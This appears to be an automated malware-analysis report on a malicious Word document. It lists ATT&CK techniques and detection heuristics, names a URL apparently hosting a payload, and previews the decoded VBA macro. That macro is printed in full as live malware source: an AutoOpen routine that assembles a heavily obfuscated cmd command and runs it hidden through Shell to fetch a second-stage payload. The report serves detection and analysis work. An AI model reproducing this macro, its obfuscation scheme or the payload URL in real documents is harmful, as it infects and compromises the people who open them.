Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The script uses the Shell function to execute a command, indicating an attempt to download and run a second-stage payload. The presence of numerous unknown-reputation URLs suggests potential C2 infrastructure or payload hosting.
Heuristics (7)
- ClamAV: Doc.Malware.Valyria-6735715-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Valyria-6735715-0.
- OLE document has large unaccounted-for region [high, OLE_SLACK_ANOMALY]: OLE file is 287,641 bytes but its declared streams total only 147,264 bytes; 140,377 bytes (49%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Password-protected archive handoff [high, SE_PASSWORD_ARCHIVE_LURE]: Document gives password instructions for an archive or attachment; this is often used to keep payloads encrypted until after gateway scanning.
- VBA macros detected [medium, OLE_VBA_MACROS, 1 related finding]: Document contains VBA macro code.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro present.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.artone.mocksitetest.com/wp-content/plugins/contact-form-7/includes/mod_filezipr.php (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29723 bytes |

SHA-256: 831614cd71219df8270d1591dba916d447de8f28a6c1285cc7561766d30988b2

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "jovqOBvRlNiVR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
MJjaaH = SrzLBh
TwYpd = CInt(FjzBj / ZzUKNO * 22030 - hQFSJl)
uSrnF = 6
wMYIzu = "" + MvMVUIGZN + RzzzQipROnucPw + CVar("cm") + CUhRviLXzwY + DHNLKdV + UIzWwNJL + uTAvWVmp + hQqafY + tSJJEbjfzB + izvaAvGAmP + SOFJuJaEO + ianZnrivkS + vZDKCH + wDMhH + EGjJhOqrk + lUMFX + YYjizjCt + OqCbYKOQaS + RYChw + aNDaSPHasQv + GqfXVKsnm + iWCddKj + SDVHwnicz + lflGdnRMqRY + wCVNHkNZT + YuNliTfZY + HtbXa + bHmVdV + iOOQT + VGQrzww + CKnZks + DdBvD + RqTQibQWN + JdUbOITBWT + iWYrkMLij + zajJrhOX + FEIGUiLKbR + lJHtrLSnmF + SnqSzzuQoU + KjGShTf + ltBbWwG + hlnMJDiBPLq + mdCuwmM + ZIchFfzzm + BhNIuiTAZHiYuw
XtHEU = 311
rGjsB = CBool(5)
Shell@ wMYIzu, 0
aoLiA = Cos(4874)
End Sub
Attribute VB_Name = "YaRCzHvjhlTcHt"
Function UIzWwNJL()
On Error Resume Next
pVACZ = HSdsnf
mJozl = Tan(QrIbjZ)
oMUAvlYns = "d" + " " + " " + " " + "/c "
LJOfVD = CBool(501)
PwqWjj = " " + " C" + "Md /v: " + " /" + "c" + " " + CStr(Chr(sViAWzlZ + owfLcccnOWbdLQ + 34 + BRiakHGuVF + TaqdscXLms)) + " sEt " + " '{@]"
zbzwN = Sin(SzkGU)
wWDfN = 816
bWLVN = CLng(60)
nQwiJw = "=\_\_" + "---/-\_\/"
zFRjV = 233439149
PZliT = 3364
WNzQnYIZrOs = "_/ /"
ktzHvh = 40
qikYm = Rnd(32873 * XErOo * 94395 + wKvFzb)
orFUhB = UuTJw
knGAXnff = "/\_" + "-" + "_-\\" + "\"
UIzWwNJL = oMUAvlYns + PwqWjj + nQwiJw + WNzQnYIZrOs + knGAXnff
ODYll = Rnd(62815 * 24518)
uFica = Tan(NHjlzq + SRjCMk)
iBrUaB = CDate(qjkjz)
End Function
Function uTAvWVmp()
On Error Resume Next
KJzJRNGo = "--/__"
HCfdb = CLng(96462 - hBquj * 69058 / bRoPDH)
lqajYs = Log(5)
rMPEmI = jGQABQ
FtOqDwjuOr = " -/" + "_/_\-" + "\" + "--\//_\ " + "\" + "//_-\-_\/" + "_-/-\ -\_\"
QQlFa = Rnd(95)
IfuhSd = CBool(OtibiN)
mcmDFYXVjwZ = "-/-_//\_-" + "_/ \/_/" + "//_\" + "_-" + "--_-\ /\_-" + "_-_/--"
jlMsO = Chr(24655 * sqlYiP)
IwZZV = jsiwY
PFiwM = Hex(2)
FZYqdYjvCH = "\_/\\" + " \-\\/" + "/" + "_" + "_/-/"
ofdkNz = 4
vzQWSL = GkdCDl
pMkiUDCXpaC = "-_" + "\- \/" + "\/_\/_-" + "\/-__- -_" + "-\/\"
QnDtiw = UUtuoI
QVvoMvFaUpA = "\_-_" + "///\- " + "//-_" + "_--\_-\/" + "/_\"
uTAvWVmp = KJzJRNGo + FtOqDwjuOr + mcmDFYXVjwZ + FZYqdYjvCH + pMkiUDCXpaC + QVvoMvFaUpA
GBOvXR = vztQvH
End Function
Function hQqafY()
On Error Resume Next
EjTjGH = Oct(SiPzAH)
fvNMrf = Sgn(7)
XdFiH = CByte(cnnhj)
zPFaFT = " -" + "-" + "_\_///-" + "\\-\/_ _/-" + "\\-\/\-_/-"
GIaQaHS = "__ --_//__" + "--_/\\\" + "\ -\/_\"
OruhHWmjOv = "-/_\" + "/-\/-_" + " _/-/\\"
MNlEY = WaQFCw
SVDYa = Cos(pivFv / zPAAF + tNGdAJ - HsUWAK)
QHVfjmqmKU = "\" + "/-_" + "_/\-- --\" + "/-//" + "\/\_\-__ -"
HzQSM = "-/\___/\//" + "\_\-}\\/-_" + "_/-_//_\\"
MMmiXQ = CStr(oVujS)
TSEizDTmBE = "-"
hQqafY = zPFaFT + GIaQaHS + OruhHWmjOv + QHVfjmqmKU + HzQSM + TSEizDTmBE
uuHKl = 856
End Function
Function tSJJEbjfzB()
On Error Resume Next
UZMIK = CDbl(7)
hFWnpY = 9052
CPmQviWiwz = "}\\/" + "/_\\" + "_-" + "-_/--_{_"
YZbAmp = Sqr(OjkOpV)
lLZPJ = Tan(YHEFKH + NwiwQE / BcLPYi - sCNBf)
ljWAJQbAmzq = "-//" + "__-\/\" + "--/\\h_/\" + "/_/\-" + "/" + "\-_--_c_"
blqOvduv = "\_" + "/\/-\--"
LuJzPI = Log(20)
FWVOUMU = "/" + "\/-_t//" + "_\--\_/" + "/\--\_a" + "\-_\\__-" + "-/-"
tSJJEbjfzB = CPmQviWiwz + ljWAJQbAmzq + blqOvduv + FWVOUMU
EPUBH = VcQZS
ajjErE = Int(owoWCv * PzmtbB)
End Function
Function izvaAvGAmP()
On Error Resume Next
AJsfj = 42
EutHi = "///\c/-\_/" + "-_\_\/_" + "-/-}/\_/\" + "\___-/--\-" + ";_-/_--" + "//\\-/" + "\\_k\_/-"
pvpiD = "_" + "\//" + "_-_-\\/a-" + "\/\/_" + "-/-\" + "-\_/" + "_e-_\_-"
GfPQu = CBool(cPYII)
SkWYMjjKpT = "\-/_/\" + "//-\r-//" + "_\_\_\-_-/" + "/\b--\_//" + "\-_//\__-" + ";//\/\-_-" + "\\/_-_-h"
wknSG = Hex(cBvShr / IplrbU)
... (truncated)